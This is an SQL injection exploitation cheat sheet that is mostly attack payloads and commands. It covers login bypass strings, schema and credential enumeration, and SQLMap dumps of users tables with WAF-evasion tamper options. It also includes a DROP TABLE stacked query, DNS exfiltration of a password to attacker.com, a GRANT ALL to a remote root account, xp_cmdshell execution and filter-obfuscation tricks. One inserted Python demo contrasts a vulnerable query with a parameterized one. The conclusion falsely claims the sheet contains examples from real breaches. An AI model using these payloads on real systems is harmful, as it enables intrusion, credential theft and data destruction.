Practical SQL Injection Exploitation Cheat Sheet
Introduction
SQL Injection (SQLi) remains one of the most dangerous vulnerabilities in web applications, allowing attackers to manipulate databases, extract sensitive data, and even gain remote access. This cheat sheet focuses on real-world SQLi exploitation with hands-on examples, bypassing security filters, and using tools like Burp Suite and SQLMap.
Ensure you have:
- Burp Suite (for manual exploitation)
- SQLMap (for automated attacks)
- A deliberately vulnerable web application to practice on
Step 1: Identifying SQL Injection Vulnerability
Manual Testing with Basic Payloads
In a login form, test with:
admin' OR '1'='1' --
If you are logged in without a valid password, the login form is vulnerable.
Check for errors using:
' OR 1=1 --
" OR 1=1 --
' OR 'a'='a' --
If a database error is returned (e.g., a syntax error or an unclosed quotation), the input is reaching the query unsanitized and the field is likely vulnerable.
Using Burp Suite to Intercept Requests
- Enable Burp Suite Proxy and intercept a login request.
- Modify the username field to admin'--
- If authentication succeeds, SQLi is present.
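As an added example (not part of the original cheat sheet), the following Python script runs the Step 1 login payloads against a constructed in-memory SQLite table and shows why a string-concatenated query is bypassed while a parameterized one is not; the table layout and the stored credentials are assumptions.

```python
import sqlite3


def make_db():
    # Constructed in-memory database with a single user (assumed data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn


def login_vulnerable(conn, username, password):
    # Builds the query by string concatenation: the attacker's quote and
    # '--' become part of the SQL, so the password check is commented out.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    # Placeholders send values separately from the statement text, so the
    # same input is compared literally against the stored username.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def raises_db_error(conn, username):
    # Mirrors the error probe above: a lone quote breaks the concatenated
    # statement, which a defender observes as a database error leaking out.
    try:
        login_vulnerable(conn, username, "x")
        return False
    except sqlite3.OperationalError:
        return True


def demo():
    # Returns {payload: (bypassed_concatenated_query, bypassed_parameterized)}
    conn = make_db()
    payloads = ["admin' OR '1'='1' --", "admin'--"]  # the two test inputs above
    return {p: (login_vulnerable(conn, p, "wrong"),
                login_parameterized(conn, p, "wrong")) for p in payloads}


if __name__ == "__main__":
    for payload, (vuln, safe) in demo().items():
        print(f"{payload!r}: concatenated={vuln} parameterized={safe}")
    print("quote probe raises error:", raises_db_error(make_db(), "'"))
```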
Step 2: Extracting Database Information
Once the injection is confirmed, extract database information with queries such as the following:
Determining Database Type
SELECT @@version; -- MySQL
SELECT version(); -- PostgreSQL
SELECT banner FROM v$version; -- Oracle
Enumerating Tables and Columns
SELECT table_name FROM information_schema.tables;
SELECT column_name FROM information_schema.columns WHERE table_name = 'users';
Extracting User Credentials
SELECT username, password FROM users;
Step 3: Automated Exploitation with SQLMap
SQLMap can automate SQL injection with simple commands.
Basic SQL Injection Scan
sqlmap -u "http://target.com/login.php?id=1" --dbs
Dumping User Credentials
sqlmap -u "http://target.com/login.php?id=1" -D database_name -T users --dump
Bypassing WAFs with Randomized Case Encoding
sqlmap -u "http://target.com/login.php?id=1" --tamper=between,randomcase
Step 4: Blind SQL Injection Exploitation
If the application displays neither errors nor query output, blind SQLi techniques can be used.
Time-Based Blind SQLi
' OR IF(1=1, SLEEP(5), 0) --
If the response is delayed by about 5 seconds, the injection is confirmed.
Boolean-Based Blind SQLi
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END) --
If the injection works, the page content differs depending on whether the injected condition is true or false.
Step 5: Exploiting Advanced SQL Injection Techniques
Stacked Queries (Executing Multiple Statements)
admin'; DROP TABLE users; --
(Only works if the database driver allows multiple statements in one query.)
Extracting Data via DNS Exfiltration
SELECT load_file(concat('\\', (SELECT password FROM users LIMIT 1), '.attacker.com\file'));
(Useful when output is blocked.)
Privilege Escalation & OS Command Execution
MySQL User Escalation
SELECT user, host FROM mysql.user;
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'hacked';
Executing System Commands in MSSQL
EXEC xp_cmdshell 'whoami';
(Useful for Remote Code Execution.)
Step 6: Bypassing Security Filters & WAFs
Most web applications use WAFs (Web Application Firewalls) to detect SQLi. Here’s how to bypass them:
Encoding Payloads (Hex, Base64, URL Encoding)
SELECT username FROM users WHERE id=0x61646D696E; -- HEX encoding
SELECT username FROM users WHERE id=BASE64_DECODE('YWRtaW4=');
Using Comment Injection to Obfuscate Payloads
SELECT/**/username/**/FROM/**/users/**/WHERE/**/id/**/=1;
Randomized Case & White Space Manipulation
SeLeCt UsErNaMe FrOm UsErS WhErE iD=1;
Conclusion
SQL Injection remains a high-impact vulnerability, but with proper understanding and hands-on practice, penetration testers can identify and exploit it effectively. This cheat sheet provided:
- Step-by-step exploitation techniques
- Real-world SQLi payloads
- WAF bypassing strategies
- Examples from actual security breaches